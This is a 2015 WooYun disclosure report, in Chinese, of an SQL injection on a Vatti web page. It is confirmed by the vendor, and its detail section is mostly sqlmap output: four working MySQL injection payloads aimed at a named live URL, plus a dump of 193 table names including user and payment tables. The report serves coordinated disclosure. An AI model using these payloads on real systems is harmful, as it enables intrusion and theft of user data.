当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151213

漏洞标题:华帝股份某站SQL注入漏洞(百万用户信息)

相关厂商:华帝股份有限公司

漏洞作者: miracle

提交时间:2015-11-02 09:52

修复时间:2015-12-19 10:52

公开时间:2015-12-19 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

详细说明:

http://vip.vatti.com.cn/index.php?a=designer&c=index&category=1111&m=designer&page=1 注入点:category

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: a=designer&c=index&category=(SELECT (CASE WHEN (9529=9529) THEN 9529 ELSE 9529*(SELECT 9529 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&m=designer&page=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: a=designer&c=index&category=1111 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(1114=1114,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=designer&page=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: a=designer&c=index&category=1111 AND (SELECT * FROM (SELECT(SLEEP(5)))dNCt)&m=designer&page=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 30 columns
    Payload: a=designer&c=index&category=1111 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7071,0x73656a6a7663694e536f,0x716b707871),NULL-- &m=designer&page=1
---
web server operating system: Windows
web application technology: Apache 2.2.25, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: hdbbs
[193 tables]
+-------------------------+
| bc_access               |
| bc_attachment           |
| bc_block                |
| bc_cart                 |
| bc_category             |
| bc_config               |
| bc_dbsource             |
| bc_field                |
| bc_kefu                 |
| bc_lang                 |
| bc_link                 |
| bc_log                  |
| bc_menu                 |
| bc_module               |
| bc_node                 |
| bc_online               |
| bc_order                |
| bc_order_data           |
| bc_page                 |
| bc_payment              |
| bc_posid                |
| bc_role                 |
| bc_role_user            |
| bc_shipping             |
| bc_slide                |
| bc_slide_data           |
| bc_tags                 |
| bc_tags_data            |
| bc_type                 |
| bc_urlrule              |
| bc_user                 |
| bc_user_address         |
| bc_winner               |
| cdb_access              |
| cdb_activities          |
| cdb_activityapplies     |
| cdb_addons              |
| cdb_adminactions        |
| cdb_admincustom         |
| cdb_admingroups         |
| cdb_adminnotes          |
| cdb_adminsessions       |
| cdb_advertisements      |
| cdb_announcements       |
| cdb_attachmentfields    |
| cdb_attachments         |
| cdb_attachpaymentlog    |
| cdb_attachtypes         |
| cdb_banned              |
| cdb_bbcodes             |
| cdb_caches              |
| cdb_creditslog          |
| cdb_crons               |
| cdb_debateposts         |
| cdb_debates             |
| cdb_design_ad           |
| cdb_designers           |
| cdb_designpic           |
| cdb_designpics          |
| cdb_designpics_temp     |
| cdb_designtype          |
| cdb_designvote          |
| cdb_distributor         |
| cdb_dps_preply_access   |
| cdb_dps_preply_posts    |
| cdb_dptype              |
| cdb_dtyep               |
| cdb_failedlogins        |
| cdb_faqs                |
| cdb_favoriteforums      |
| cdb_favorites           |
| cdb_favoritethreads     |
| cdb_feeds               |
| cdb_forumfields         |
| cdb_forumlinks          |
| cdb_forumrecommend      |
| cdb_forums              |
| cdb_giftlog             |
| cdb_gifts               |
| cdb_gifts_ad            |
| cdb_gifttype            |
| cdb_handbook            |
| cdb_handbook_ad         |
| cdb_handbook_temp       |
| cdb_handbooktype        |
| cdb_imagetypes          |
| cdb_invites             |
| cdb_itempool            |
| cdb_kc_ad               |
| cdb_kc_config           |
| cdb_kc_gg               |
| cdb_kc_ydinfo           |
| cdb_kc_yuding           |
| cdb_kecheng             |
| cdb_kechengtype         |
| cdb_loginlog            |
| cdb_magiclog            |
| cdb_magicmarket         |
| cdb_magics              |
| cdb_medallog            |
| cdb_medals              |
| cdb_memberfields        |
| cdb_membermagics        |
| cdb_memberrecommend     |
| cdb_members             |
| cdb_memberspaces        |
| cdb_moderators          |
| cdb_modworks            |
| cdb_music_info          |
| cdb_mytasks             |
| cdb_navs                |
| cdb_onlinelist          |
| cdb_onlinetime          |
| cdb_orders              |
| cdb_paymentlog          |
| cdb_pluginhooks         |
| cdb_plugins             |
| cdb_pluginvars          |
| cdb_polloptions         |
| cdb_polls               |
| cdb_postposition        |
| cdb_posts               |
| cdb_profilefields       |
| cdb_projects            |
| cdb_promotions          |
| cdb_prompt              |
| cdb_promptmsgs          |
| cdb_prompttype          |
| cdb_ques_option         |
| cdb_ques_result         |
| cdb_ques_topic          |
| cdb_ques_user           |
| cdb_ques_user_download  |
| cdb_ranks               |
| cdb_ratelog             |
| cdb_regips              |
| cdb_relatedthreads      |
| cdb_reportlog           |
| cdb_request             |
| cdb_rewardlog           |
| cdb_rsscaches           |
| cdb_searchindex         |
| cdb_sessions            |
| cdb_settings            |
| cdb_smilies             |
| cdb_spacecaches         |
| cdb_stats               |
| cdb_statvars            |
| cdb_styles              |
| cdb_stylevars           |
| cdb_tags                |
| cdb_tasks               |
| cdb_taskvars            |
| cdb_teacher             |
| cdb_teachervote         |
| cdb_templates           |
| cdb_threads             |
| cdb_threadsmod          |
| cdb_threadtags          |
| cdb_threadtypes         |
| cdb_tktools             |
| cdb_tradecomments       |
| cdb_tradelog            |
| cdb_tradeoptionvars     |
| cdb_trades              |
| cdb_ttyep               |
| cdb_typemodels          |
| cdb_typeoptions         |
| cdb_typeoptionvars      |
| cdb_typevars            |
| cdb_uc_admins           |
| cdb_uc_applications     |
| cdb_uc_badwords         |
| cdb_uc_domains          |
| cdb_uc_failedlogins     |
| cdb_uc_feeds            |
| cdb_uc_friends          |
| cdb_uc_mailqueue        |
| cdb_uc_memberfields     |
| cdb_uc_members          |
| cdb_uc_mergemembers     |
| cdb_uc_newpm            |
| cdb_uc_notelist         |
| cdb_uc_pms              |
| cdb_uc_protectedmembers |
| cdb_uc_settings         |
| cdb_uc_sqlcache         |
| cdb_uc_tags             |
| cdb_uc_vars             |
| cdb_usergroups          |
| cdb_validating          |
| cdb_warnings            |
| cdb_words               |
+-------------------------+

22.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 miracle@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-04 10:51

厂商回复:

谢谢作者!我们会尽快处理。

最新状态:

暂无

漏洞评价:

评论